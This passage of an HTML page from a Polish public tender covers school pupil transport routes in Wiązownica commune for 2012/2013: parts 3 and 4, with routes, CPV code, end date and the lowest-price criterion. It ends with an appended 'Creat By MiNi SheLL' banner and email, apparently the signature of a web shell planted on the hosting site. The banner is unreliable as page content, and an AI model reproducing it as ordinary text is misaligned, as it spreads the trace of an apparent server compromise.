<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  Zespołu Szkół w Szówsku  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania 
dowozu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług  w zakresie dowozu uczniów   do szkół  podstawowych i gimnazjów  na terenie gminy Wiązownica w roku szkolnym 2012/2013 z zapewnieniem opieki w czasie dowozu. Dowóz uczniów do szkół  odbywał się będzie w dni nauki szkolnej z wyłączeniem przerw świątecznych, ferii zimowych oraz innych ustawowych wolnych dni od zajęć szkolnych.
Dowozem objęci będą  uczniowie  zamieszkali w następujących miejscowościach:
Dla zadania Nr 3 przewidziano 1 trasę dowozu  z  miejscowości  Szówsko - Krzyżówka przez  Koniaczów, Surochów do Zespołu Szkół w Szówsku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  szkoły podstawowej  w Mołodyczu w  roku szkolnym 2012/2013 wraz z zapewnieniem opieki 
w czasie trwania dowozu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług  w zakresie dowozu uczniów   do szkół podstawowych i gimnazjów  na terenie gminy Wiązownica w roku szkolnym 2012/2013  z zapewnieniem opieki w czasie dowozu. Dowóz uczniów do szkół  odbywał się będzie w dni nauki szkolnej z wyłączeniem przerw świątecznych, ferii zimowych oraz innych ustawowych wolnych dni od zajęć szkolnych.
Dowozem objęci będą  uczniowie  zamieszkali w następujących miejscowościach:
Dla zadania Nr 4 przewidziano 1 trasę  dowozu z miejscowości Radawa i Mołodycz do Szkoły Podstawowej w Mołodyczu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com